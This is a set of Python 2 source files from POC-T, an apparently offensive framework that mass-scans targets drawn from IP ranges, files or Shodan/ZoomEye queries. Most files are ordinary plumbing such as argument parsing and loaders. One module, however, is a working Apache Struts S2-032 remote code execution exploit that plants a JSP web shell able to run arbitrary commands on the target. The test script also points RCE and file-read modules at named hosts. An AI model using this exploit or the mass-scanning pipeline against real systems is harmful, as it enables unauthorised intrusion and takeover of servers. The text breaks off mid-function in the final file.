#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import os
import glob
import time
import sys
from lib.core.data import conf, paths, th, logger
from lib.core.enums import CUSTOM_LOGGING, TARGET_MODE_STATUS, ENGINE_MODE_STATUS
import lib.utils.cnhelp as cnhelp
from lib.utils.update import update
from lib.core.enums import API_MODE_STATUS
from lib.core.register import Register


def initOptions(args):
    if '--debug' in sys.argv:  # cannot use dataToStdout before init
        infoMsg = '---args---\n%s' % args
        logger.log(CUSTOM_LOGGING.SYSINFO, infoMsg)
    _checkCNhelp(args)
    _checkUpdate(args)
    _checkShow(args)
    _initEngine(args)
    _initModule(args)
    _initTargetMode(args)
    _initOutput(args)
    _initSafeOptions(args)


def _checkUpdate(args):
    # conflict with args.update(),so we use args['update'] here
    if args['update']:
        conf.UPDATE = args['update']
        update()


def _checkShow(args):
    if args.show:
        module_name_list = glob.glob(os.path.join(paths.SCRIPT_PATH, '*.py'))
        infoMsg = 'Module Name (total:%s)\n' % str(len(module_name_list) - 1)
        for each in module_name_list:
            _str = os.path.splitext(os.path.split(each)[1])[0]
            if _str not in ['__init__']:
                infoMsg += '  %s\n' % _str
        sys.exit(logger.log(CUSTOM_LOGGING.SYSINFO, infoMsg))


def _initEngine(args):
    def __thread():
        conf.ENGINE = ENGINE_MODE_STATUS.THREAD

    def __gevent():
        conf.ENGINE = ENGINE_MODE_STATUS.GEVENT

    msg = 'Use -T to set Multi-Threaded mode or -C to set Coroutine mode.'
    r = Register(mutex=True, mutex_errmsg=msg)
    r.add(__thread, args.T)
    r.add(__gevent, args.C)
    r.run()

    if args.t > 0 and args.t < 101:
        th.THREADS_NUM = conf.THREADS_NUM = args.t
    else:
        msg = 'Invalid input in [-t], range: 1 to 100'
        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))


def _initModule(args):
    if not args.m:
        msg = 'Use -m to select a module name. Example: -m spider'
        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))
    if args.m and not os.path.isfile(os.path.join(paths.SCRIPT_PATH, args.m + ".py")):
        msg = 'module not exist. Use --show to view all available module names.'
        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))
    conf.MODULE_NAME = args.m
    conf.MODULE_FILE_PATH = os.path.join(paths.SCRIPT_PATH, conf.MODULE_NAME + ".py")


def _initTargetMode(args):
    def __file():
        if not os.path.isfile(args.f):
            msg = 'TargetFile not found: %s' % args.f
            sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))
        conf.TARGET_MODE = TARGET_MODE_STATUS.FILE
        conf.INPUT_FILE_PATH = args.f

    def __range():
        help_str = "invalid input in [-i], Example: python POC-T -m test -i 1-100."
        try:
            _int = args.i.strip().split('-')
            if int(_int[0]) < int(_int[1]):
                if int(_int[1]) - int(_int[0]) > 1000000:
                    warnMsg = 'Loading %d Payloads...\nMaybe its too much, continue? [y/N]' % (
                        int(_int[1]) - int(_int[0]))
                    logger.log(CUSTOM_LOGGING.WARNING, warnMsg)
                    a = raw_input()
                    if a in ('Y', 'y', 'yes'):
                        pass
                    else:
                        msg = 'User quit!'
                        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))
            else:
                sys.exit(logger.log(CUSTOM_LOGGING.ERROR, help_str))
        except Exception, e:
            sys.exit(logger.log(CUSTOM_LOGGING.ERROR, help_str))
        conf.TARGET_MODE = TARGET_MODE_STATUS.RANGE
        conf.I_NUM2 = args.i
        conf.INPUT_FILE_PATH = None

    def __ipmask():
        conf.TARGET_MODE = TARGET_MODE_STATUS.IPMASK
        conf.NETWORK_STR = args.n
        conf.INPUT_FILE_PATH = None

    def __single():
        conf.TARGET_MODE = TARGET_MODE_STATUS.SINGLE
        conf.SINGLE_TARGET_STR = args.s
        th.THREADS_NUM = conf.THREADS_NUM = 1
        conf.INPUT_FILE_PATH = None

    def __api():
        conf.TARGET_MODE = TARGET_MODE_STATUS.API
        _checkAPI(args)

    msg = 'To load targets, please choose one from [-s|-i|-f|-n|--api].'
    r = Register(mutex=True, mutex_errmsg=msg)
    r.add(__file, args.f)
    r.add(__api, args.api)
    r.add(__ipmask, args.n)
    r.add(__range, args.i)
    r.add(__single, args.s)
    r.run()


def _initOutput(args):
    if not args.nF and args.o:
        msg = 'You cannot use [--nF] and [-o] together, please read the usage with [-h].'
        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))

    if not args.nF and args.browser:
        msg = '[--browser] is based on file output, please remove [--nF] in your command and try again.'
        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))

    conf.SCREEN_OUTPUT = args.nS
    conf.FILE_OUTPUT = args.nF
    conf.OUTPUT_FILE_PATH = os.path.abspath(args.o) if args.o else \
        os.path.abspath(
            os.path.join(
                paths.OUTPUT_PATH, time.strftime(
                    '[%Y%m%d-%H%M%S]', time.localtime(
                        time.time())) + conf.MODULE_NAME + '.txt'))


def _initSafeOptions(args):
    conf.SINGLE_MODE = args.single
    conf.DEBUG = args.debug
    conf.OPEN_BROWSER = args.browser


def _checkCNhelp(args):
    if args.helpCN:
        print cnhelp.__doc__
        sys.exit(0)


def _checkAPI(args):
    api_mode_flag = 0
    if args.dork or args.max_page != 1 or args.search_type != 'host':
        api_mode_flag += 1
    if args.shodan_query or args.shodan_limit != 100 or args.shodan_offset != 0:
        api_mode_flag += 2
    if api_mode_flag not in (1, 2):
        msg = 'You can only use args from ZoonEye-API *or* Shodan-API.'
        sys.exit(logger.log(CUSTOM_LOGGING.ERROR, msg))
    if args.dork:
        try:
            if int(args.max_page) <= 0:
                msg = 'Invalid value in [--max-page], show usage with [-h].'
                logger.error(msg)
        except Exception:
            msg = 'Invalid value in [--max-page], show usage with [-h].'
            logger.error(msg)

        if args.search_type not in ['web', 'host']:
            msg = 'Invalid value in [--search-type], show usage with [-h].'
            logger.error(msg)

        conf.API_MODE = API_MODE_STATUS.ZOOMEYE
        conf.zoomeye_dork = args.dork
        conf.zoomeye_max_page = args.max_page
        conf.zoomeye_search_type = args.search_type

    elif args.shodan_query:
        try:
            if int(args.shodan_limit) <= 0:
                msg = 'Invalid value in [--limit], show usage with [-h].'
                logger.error(msg)
        except Exception:
            msg = 'Invalid value in [--limit], show usage with [-h].'
            logger.error(msg)

        try:
            if int(args.shodan_limit) <= 0:
                msg = 'Invalid value in [--offset], show usage with [-h].'
                logger.error(msg)
        except Exception:
            msg = 'Invalid value in [--offset], show usage with [-h].'
            logger.error(msg)

        conf.API_MODE = API_MODE_STATUS.SHODAN
        conf.shodan_query = args.shodan_query
        conf.shodan_limit = args.shodan_limit
        conf.shodan_offset = args.shodan_offset



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

from lib.core.log import LOGGER
from lib.core.datatype import AttribDict

"""
paths
    ROOT_PATH
    DATA_PATH
    SCRIPT_PATH
    OUTPUT_PATH
    UA_LIST_PATH
    WEAK_PASS
    LARGE_WEAK_PASS

conf
    MODULE_NAME        **
    MODULE_FILE_PATH   **.py
    TARGET_MODE        f / i / n
    INPUT_FILE_PATH    path
    SCREEN_OUTPUT      T / F
    FILE_OUTPUT        T / F
    OUTPUT_FILE_PATH   path
    THREADS_NUM        int
    I_NUM2             string
    SINGLE_MODE        T / F
    ENGINE             t / c
    DEBUG              T / F
    UPDATE             T / F
    NETWORK_STR        string
    RANDOM_UA          T / F
    OPEN_BROWSER       T / F
    # TODO
    DISABLE_COLOR      T / F

th
    module_obj
    queue
    THREADS_NUM
    UA_LIST
    MODULE_NAME

"""

logger = LOGGER

paths = AttribDict()

cmdLineOptions = AttribDict()

conf = AttribDict()

th = AttribDict()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

"""
Struts S2-032 RCE PoC

Usage:
  python POC-T.py -T -m struts2-s2032 -f [file]
"""

import random
import requests


def poc(url):
    jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
    content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
              'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
              '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
              '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
              'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
              '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
              'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
              'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
              '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
              '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
              '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
              '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'

    poc_url = "{url}?method:%23_memberAccess%3d@ognl.OgnlContext" \
              "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
              "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
              "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
              "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
              "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
              "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
              "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
              "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \
              "content}".format(url=url, filename=jsp_file, content=content)

    try:
        s = requests.get(poc_url)
        if s.status_code == 200 and jsp_file in s.content and 'method:' not in s.content:
            # print s.content
            return True
        else:
            return False
    except Exception, e:
        print e
        return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

"""
Use as 'from lib.utils import versioncheck'
It has to be the first non-standard import before your project enter main() function
"""

import sys

PYVERSION = sys.version.split()[0]

if PYVERSION >= "3" or PYVERSION < "2.6":
    exit("[CRITICAL] incompatible Python version detected ('%s'). "
         "For successfully running this project, you'll have to use version 2.6 or 2.7 "
         "(visit 'http://www.python.org/download/')" % PYVERSION)

extensions = ("gzip", "ssl", "sqlite3", "zlib")
try:
    for _ in extensions:
        __import__(_)
except ImportError:
    errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions))
    errMsg += "most probably because current version of Python has been "
    errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')"
    exit(errMsg)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import Queue
import sys
import imp
import os
from lib.core.data import th, conf, logger, paths
from lib.core.enums import CUSTOM_LOGGING, EXIT_STATUS, API_MODE_STATUS, TARGET_MODE_STATUS
from lib.core.common import debugPause, systemQuit
from lib.core.settings import ESSENTIAL_MODULE_METHODS
from lib.core.exception import ToolkitValueException
from lib.controller.api import setApi
from thirdparty.IPy import IPy


def loadModule():
    _name = conf.MODULE_NAME
    infoMsg = 'Loading custom script: %s.py' % _name
    logger.log(CUSTOM_LOGGING.SUCCESS, infoMsg)

    fp, pathname, description = imp.find_module(_name, [paths.SCRIPT_PATH])
    try:
        th.module_obj = imp.load_module("_", fp, pathname, description)
        for each in ESSENTIAL_MODULE_METHODS:
            if not hasattr(th.module_obj, each):
                errorMsg = "Can't find essential method:'%s()' in current script:'module/%s.py'\n%s" \
                           % (each, _name, 'Please modify your script/PoC.')
                logger.log(CUSTOM_LOGGING.ERROR, errorMsg)
                systemQuit(EXIT_STATUS.ERROR_EXIT)
    except ImportError, e:
        errorMsg = "Your current scipt [%s.py] caused this exception\n%s\n%s" \
                   % (_name, '[Error Msg]: ' + str(e), 'Maybe you can download this module from pip or easy_install')
        logger.log(CUSTOM_LOGGING.ERROR, errorMsg)
        systemQuit(EXIT_STATUS.ERROR_EXIT)
    debugPause()


def loadPayloads():
    infoMsg = 'Loading payloads...'
    logger.log(CUSTOM_LOGGING.SUCCESS, infoMsg)
    th.queue = Queue.Queue()
    if conf.TARGET_MODE is TARGET_MODE_STATUS.RANGE:
        int_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.FILE:
        file_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.IPMASK:
        net_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.SINGLE:
        single_target_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.API:
        api_mode()

    else:
        raise ToolkitValueException('conf.TARGET_MODE value ERROR.')
    logger.log(CUSTOM_LOGGING.SUCCESS, 'Total: %s' % str(th.queue.qsize()))
    debugPause()


def file_mode():
    for line in open(conf.INPUT_FILE_PATH):
        sub = line.strip()
        if sub:
            th.queue.put(sub)


def int_mode():
    _int = conf.I_NUM2.strip().split('-')
    for each in range(int(_int[0].strip()), int(_int[1].strip())):
        th.queue.put(str(each))


def net_mode():
    ori_str = conf.NETWORK_STR
    try:
        _list = IPy.IP(ori_str)
    except Exception, e:
        sys.exit(logger.error('Invalid IP/MASK,%s' % e))
    for each in _list:
        th.queue.put(str(each))


def single_target_mode():
    th.queue.put(str(conf.SINGLE_TARGET_STR))


def api_mode():
    if conf.API_MODE is API_MODE_STATUS.ZOOMEYE:
        conf.ZOOMEYE_OUTPUT_PATH = os.path.join(paths.DATA_PATH, 'zoomeye')
        if not os.path.exists(conf.ZOOMEYE_OUTPUT_PATH):
            os.mkdir(conf.ZOOMEYE_OUTPUT_PATH)

    elif conf.API_MODE is API_MODE_STATUS.SHODAN:
        conf.SHODAN_OUTPUT_PATH = os.path.join(paths.DATA_PATH, 'shodan')
        if not os.path.exists(conf.SHODAN_OUTPUT_PATH):
            os.mkdir(conf.SHODAN_OUTPUT_PATH)

    file = setApi()
    for line in open(file):
        sub = line.strip()
        if sub:
            th.queue.put(sub)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import os.path
from lib.parse.cmdline import cmdLineParser
from lib.core.option import initOptions
from lib.controller.loader import loadModule, loadPayloads
from lib.core.common import setPaths, showDebugData, banner, systemQuit, openBrowser
from lib.core.data import paths, conf, logger, cmdLineOptions
from lib.core.enums import EXIT_STATUS
from lib.core.settings import IS_WIN
from lib.core.exception import ToolkitUserQuitException
from lib.core.exception import ToolkitMissingPrivileges
from lib.core.exception import ToolkitSystemException
from lib.controller.engine import run
from thirdparty.colorama.initialise import init as winowsColorInit


def main():
    """
    Main function of POC-T when running from command line.
    """
    try:
        paths.ROOT_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
        try:
            os.path.isdir(paths.ROOT_PATH)
        except UnicodeEncodeError:
            errMsg = "your system does not properly handle non-ASCII paths. "
            errMsg += "Please move the project root directory to another location"
            logger.error(errMsg)
            raise SystemExit
        setPaths()

        cmdLineOptions.update(cmdLineParser().__dict__)
        initOptions(cmdLineOptions)

        if IS_WIN:
            winowsColorInit()
        banner()

        if conf.DEBUG:
            showDebugData()

        loadModule()
        loadPayloads()

        run()

        if conf.OPEN_BROWSER:
            openBrowser()

        systemQuit(EXIT_STATUS.SYSETM_EXIT)

    except ToolkitMissingPrivileges, e:
        logger.error(e)
        systemQuit(EXIT_STATUS.ERROR_EXIT)
    except ToolkitSystemException, e:
        logger.error(e)
        systemQuit(EXIT_STATUS.ERROR_EXIT)

    except ToolkitUserQuitException:
        systemQuit(EXIT_STATUS.USER_QUIT)
    except KeyboardInterrupt:
        systemQuit(EXIT_STATUS.USER_QUIT)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import argparse
import sys
from lib.core.settings import VERSION


def cmdLineParser():
    parser = argparse.ArgumentParser(description='powered by cdxy <mail:i@cdxy.me> ',
                                     usage='\n  python POC-T.py [-T|-C] [-m NAME] [-s|-f|-i|-n|--api VALUE] [options]'
                                           '\n  python POC-T.py [-h|-v|--show|--update]'
                                           '\n\nexample:\n'
                                           '  python POC-T.py -T -m jboss-poc -s http://www.cdxy.me\n'
                                           '  python POC-T.py -T -m test -f ./dic/1-100.txt\n'
                                           '  python POC-T.py -C -m test -i 1-100\n'
                                           '  python POC-T.py -C -m spider -n 10.0.0.0/24\n'
                                           '  python POC-T.py -T -m test --api --dork "port:21" --max-page 5\n'
                                           '  python POC-T.py -T -m test --api --query "solr country:cn" --limit 10 --offset 0',
                                     add_help=False)

    engine = parser.add_argument_group('engine')
    engine.add_argument('-T', default=False, action='store_true',
                        help='load Multi-Threaded engine')

    engine.add_argument('-C', default=False, action='store_true',
                        help='load Coroutine engine (single-threaded with asynchronous)')

    engine.add_argument('-t', metavar='NUM', type=int, default=10,
                        help='num of threads/concurrent, 10 by default')

    module = parser.add_argument_group('module')

    module.add_argument('-m', metavar='NAME', type=str, default='',
                        help='select Module/POC name in ./module/ (without ".py")')

    target = parser.add_argument_group('target mode')

    target.add_argument('-s', metavar='TARGET', type=str, default='',
                        help="scan a single target (e.g. www.wooyun.org)")
    target.add_argument('-f', metavar='FILE', type=str, default='',
                        help='load targets from TargetFile (e.g. ./data/wooyun_domain)')
    target.add_argument('-i', metavar='START-END', type=str, default='',
                        help='generate targets from int(start) to int(end) (e.g. 1-100)')
    target.add_argument('-n', metavar='IP/MASK', type=str, default='',
                        help='load target IPs from IP/MASK. (e.g. 127.0.0.0/24)')
    target.add_argument('--api', default=False, action='store_true',
                        help='get targets from ZoomEye/Shodan/Censys API.')

    optimization = parser.add_argument_group('optimization')

    optimization.add_argument('-o', metavar='FILE', type=str, default='',
                              help='output file path&name. default in ./output/')
    optimization.add_argument('--single', default=False, action='store_true',
                              help='exit after finding the first victim/password.')
    optimization.add_argument('--nF', default=True, action='store_false',
                              help='disable file output')
    optimization.add_argument('--nS', default=True, action='store_false',
                              help='disable screen output')
    optimization.add_argument('--show', default=False, action='store_true',
                              help='show available module/POC names and exit')
    optimization.add_argument('--browser', default=False, action='store_true',
                              help='Open notepad or web browser to view report after task finished.')
    optimization.add_argument('--debug', default=False, action='store_true',
                              help='show more details while running')
    optimization.add_argument('--update', default=False, action='store_true',
                              help='update POC-T from github')
    optimization.add_argument('-v', '--version', action='version', version=VERSION,
                              help="show program's version number and exit")
    optimization.add_argument('-h', '--help', action='help',
                              help='show this help message and exit')
    optimization.add_argument('-hc', '--helpCN', default=False, action='store_true',
                              help=u'打印中文帮助(show help message in Chinese)')

    ZoomeyeApi = parser.add_argument_group('ZoomEye API')
    ZoomeyeApi.add_argument("--dork", metavar='STRING', dest="dork", action="store", default=None,
                            help="ZoomEye dork used for search.")
    ZoomeyeApi.add_argument("--max-page", metavar='PAGE', dest="max_page", type=int, default=1,
                            help="(optional) Max page used in ZoomEye API (10 targets/Page, default:1).")
    ZoomeyeApi.add_argument("--search-type", metavar='TYPE', dest="search_type", action="store", default='host',
                            help="(optional) search type used in ZoomEye API, web or host (default:host)")

    ShodanAPI = parser.add_argument_group('Shodan API')
    ShodanAPI.add_argument("--query", metavar='STRING', dest="shodan_query", action="store", default=None,
                           help="Search query; identical syntax to the website")
    ShodanAPI.add_argument("--limit", metavar='LIMIT', dest="shodan_limit", type=int, default=100,
                           help="(optional) Number of results to return (default:100)")
    ShodanAPI.add_argument("--offset", metavar='OFFSET', dest="shodan_offset", type=int, default=0,
                           help="(optional) Search offset to begin getting results from (default:0)")

    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    return args



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import random
import hashlib
import requests
import socket
import re
from string import ascii_lowercase
from urlparse import urlparse
from lib.core.exception import ToolkitPluginException


def randomString(length=8):
    """
    生成随机字符串

    randomString()  ==> ndzldryt
    """

    return ''.join([random.choice(ascii_lowercase) for _ in range(length)])


def randomMD5(hex=True):
    """
    生成随机MD5 key-value
    hex True:32位 False:16位

    randomMD5()  ==>  ['ftx', '6aecac5e4af18f283d09b56e3d5dc5b8']
    """
    plain = randomString(3)
    m = hashlib.md5()
    m.update(plain)
    cipher = m.hexdigest() if hex else m.hexdigest()[8:-8]
    return [plain, cipher]


def redirectURL(url):
    """
    获取跳转后的真实URL

    http://123.132.112.21  ==>  http://123.132.112.21/dxy/index.action
    """

    try:
        url = url if '://' in url else 'http://' + url
        r = requests.get(url, allow_redirects=False)
        return r.headers.get('location') if r.status_code == 302 else url
    except:
        raise ToolkitPluginException('Get redirect URL failed, plsase check your PoC code.')


def host2IP(url):
    """
    检查target是否为IP格式,如果是IP格式直接返回,是URL格式则自动转为IP:PORT

    http://www.cdxy.me/test/index.php?id=1       ==>  139.129.132.156
    http://www.cdxy.me:8080/test/index.php?id=1  ==>  139.129.132.156:8080
    """

    for offset in url:
        if offset.isalpha():
            break
    else:
        return url
    try:
        url = url if '://' in url else 'http://' + url  # to get netloc
        url = urlparse(url).netloc
        ans = [i for i in socket.getaddrinfo(url.split(':')[0], None)[0][4] if i != 0][0]
        if ':' in url:
            ans += ':' + url.split(':')[1]
        return ans
    except:
        raise ToolkitPluginException('Get host IP failed, plsase check your PoC code.')


def IP2domain(base):
    """
    查找IP对应的域名
    用例：def poc(ip); if passed: return IP2domain(ip); # 在poc脚本的return中使用

    139.129.132.156 -> |www.cdxy.me
    """
    try:
        domains = set()
        ip = base.split(':')[0] if ':' in base else base
        q = "https://www.bing.com/search?q=ip%3A" + ip
        c = requests.get(q, headers={
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'}).content
        p = re.compile(r'<cite>(.*?)</cite>')
        l = re.findall(p, c)
        for each in l:
            domain = each.split('://')[-1].split('/')[0]
            domains.add(domain)
        if len(domains) > 0:
            ans_1 = base + ' -> '
            for each in domains:
                ans_1 += '|' + each
            return ans_1
        else:
            return False
    except Exception:
        return base


def checkPortTcp(target, port):
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(10)
    try:
        sk.connect((target, port))
        return True
    except Exception:
        return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import os
import time
from lib.core.data import conf, logger
from lib.core.log import CUSTOM_LOGGING
from lib.core.enums import API_MODE_STATUS
from lib.api.shodan.query import advancedQuery
from lib.api.zoomeye.search import dorkSearch


def runShodanApi():
    logger.log(CUSTOM_LOGGING.SYSINFO, 'Retriving targets from Shodan...')
    anslist = advancedQuery(query=conf.shodan_query, offset=conf.shodan_offset, limit=conf.shodan_limit)
    tmpIpFile = os.path.join(conf.SHODAN_OUTPUT_PATH, '%s_%s.txt' % (
        conf.shodan_query.replace(':', '-').replace(' ', '-').strip(), time.strftime('%Y_%m_%d_%H_%M_%S')))
    with open(tmpIpFile, 'w') as fp:
        for each in anslist:
            fp.write(each + '\n')
    return tmpIpFile


def runZoomEyeApi():
    logger.log(CUSTOM_LOGGING.SYSINFO, 'Enable ZoomEye API.')
    anslist = dorkSearch(query=conf.zoomeye_dork, type=conf.zoomeye_search_type, page=conf.zoomeye_max_page)
    tmpIpFile = os.path.join(conf.ZOOMEYE_OUTPUT_PATH, '%s_%s.txt' % (
        conf.zoomeye_dork.replace(':', '-').replace(' ', '-').strip(), time.strftime('%Y_%m_%d_%H_%M_%S')))
    with open(tmpIpFile, 'w') as fp:
        for each in anslist:
            fp.write(each + '\n')
    return tmpIpFile


def setApi():
    if conf.API_MODE is API_MODE_STATUS.ZOOMEYE:
        return runZoomEyeApi()
    elif conf.API_MODE is API_MODE_STATUS.SHODAN:
        return runShodanApi()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import random
import requests
import time
from string import ascii_lowercase

# your API-key in "http://cloudeye.me/?a=list"
key = '1e860ff056b33000----------------'

# your personal sub-domain, like: xxxxxx.dnslog.info
uniq_domain = 'xxxxxx'


class CloudEye:
    def __init__(self):
        self.unique = uniq_domain
        self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)])

    def getRandomDomain(self, custom='poc'):
        """
        full domain = [random].[custom].[unique].dnslog.info
        e.g. fezarvgo.poc.ee8a6f.dnslog.info
        """
        self.custom = custom
        return '%s.%s.%s.dnslog.info' % (self.random, self.custom, self.unique)

    def getDnsRecord(self, delay=2):
        time.sleep(delay)
        query = self.random + '.' + self.custom
        api_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=query)
        return requests.post(api_base).content

    def getHttpRecord(self, delay=2):
        time.sleep(delay)
        query = self.random + '.' + self.custom
        api_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=query)
        return requests.post(api_base).content

    def verifyDNS(self, delay=2):
        return 'dnslog.info' in self.getDnsRecord(delay)

    def verifyHTTP(self, delay=2):
        return 'dnslog.info' in self.getHttpRecord(delay)


if __name__ == '__main__':
    c = CloudEye()
    a = c.getRandomDomain('cdxy')
    try:
        requests.get('http://' + a, timeout=1)
    except:
        pass
    print c.verifyDNS(delay=0)
    print c.verifyHTTP(delay=0)
    print c.getDnsRecord(delay=0)
    print c.getHttpRecord(delay=0)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

"""
POC-T functional testing script
"""

valid = """
-h
--help
-hc
--helpCn
-v
--version
--show
-C -m test -i 1-10
-T -m test -n 127.0.0.0/28 --browser --nS
-T -m test -f ./data/wooyun_domain --single -o test_ans.txt
-C -m bingc -t 9 -n 139.129.132.0/28 --nF --debug
-T -m solr-unauth --api --dork "solr country:cn" --max-page 2 --search-type host
-T -m bingc --api --query "solr country:cn" --offset 10 --limit 5
"""

invalid = """
-m test
-T --nF
-T -s --api
-T -s -f -n
-T -s -f -n -i --api
-T -C -m test -i 1-10
-T -t -1 -m test -i 1-10
-C -m test -i -1-10
-C -m test -i a-100
-C -m test -i 5-1
-T -m test213zdf -i 1-10
-T -m test -i 1-10 --nF -o aaa.txt
-T -m test -i 1-10 --nF --browser
-T -m test --api --dork "test" --query "test"
-T -m test -i 1-10 -n 127.0.0.0/30
-T -m test -s 111 -f test.txt
-T -m test -i 1-10 --api --dork "country:cn" --max-page 0
-T -m test -i 1-10 --api --dork "country:cn" --max-page defs
-T -m test -i 1-10 --api --dork "country:cn" --max-page 1 --search-type aaa
-T -m test -i 1-10 --api --query "country:cn" --offset -1
-T -m test -i 1-10 --api --query "country:cn" --offset asdsafse
-T -m test -i 1-10 --api --query "country:cn" --limit 0
-T -m test -i 1-10 --api --query "country:cn" --limit -1
-T -m test -i 1-10 --api --query "country:cn" --limit afefea
"""

scripts_with_plugin = """
bingc 139.129.132.156
confluence-file-read www.cdxy.me
jboss-rce www.cdxy.me
solr-unauth http://36.110.167.60:8080
"""

header = """
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T
"""

import os


def headerCheck(path):
    parents = os.listdir(path)
    for parent in parents:
        if parent == 'thirdparty':
            continue
        child = os.path.join(path, parent)
        if os.path.isdir(child):
            headerCheck(child)
        elif os.path.isfile(child):
            if child.endswith('.py'):
                a = ''.join(open(child).readlines()[:4]).replace('\n', '')
                if a != header.replace('\n', ''):
                    raise Exception('unformed header in: ' + child)


if __name__ == '__main__':
    root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    headerCheck(root_dir)

    os.chdir(root_dir)
    base = 'python POC-T.py '

    print '\n\n==== Testing features ====\n\n'
    os.system('python3 POC-T.py')
    os.system('python POC-T.py')
    for each in valid.splitlines():
        if len(each) > 1:
            print '[*] ' + base + each.strip()
            try:
                os.system(base + each.strip())
            except Exception, e:
                print e

    print '\n\n==== Testing invalid args ====\n\n'
    for each in invalid.splitlines():
        if len(each) > 1:
            print '[*] ' + base + each.strip()
            try:
                os.system(base + each.strip())
            except Exception, e:
                print(e)

    print '\n\n==== Testing Scripts & Plugins ====\n\n'
    for each in scripts_with_plugin.splitlines():
        if len(each) > 1:
            _l = each.strip().split(' ')
            command = 'python POC-T.py -T -t 1 -m %s -s %s --nF' % (str(_l[0]), str(_l[1]))
            print '[*] ' + command
            os.system(command)

    if os.path.isfile('test_ans.txt'):
        os.remove('test_ans.txt')



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

"""
Functions to extract IP from content string
edit by cdxy [i@cdxy.me]
May 23 Mon, 2016

parameters：
  content
  remove_duplicate  (default:true)
  remove_private    (default:False)

usage:
 from lib.util.extracts import *
 ip_list = getIP(content)

private address：
 10.0.0.0 - 10.255.255.255
 172.16.0.0 - 172.31.255.255
 192.168.0.0 - 192.168.255.255
 127.0.0.0 - 127.255.255.255
"""

import re


def getIP(content, remove_duplicate=True, remove_private=False):
    """
    > print getIP('ffeac12.2.2.2asf^&10.10\n.1.1ffa2\n')
    ['12.2.2.2','10.10.1.1']

    """
    content = content.replace('\n', ',')
    p = re.compile(r'(?:(?:2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(?:2[0-4]\d|25[0-5]|[01]?\d\d?)')
    _ = re.findall(p, content)
    ans = list(set(_)) if remove_duplicate else _

    if remove_private:
        for each in ans:
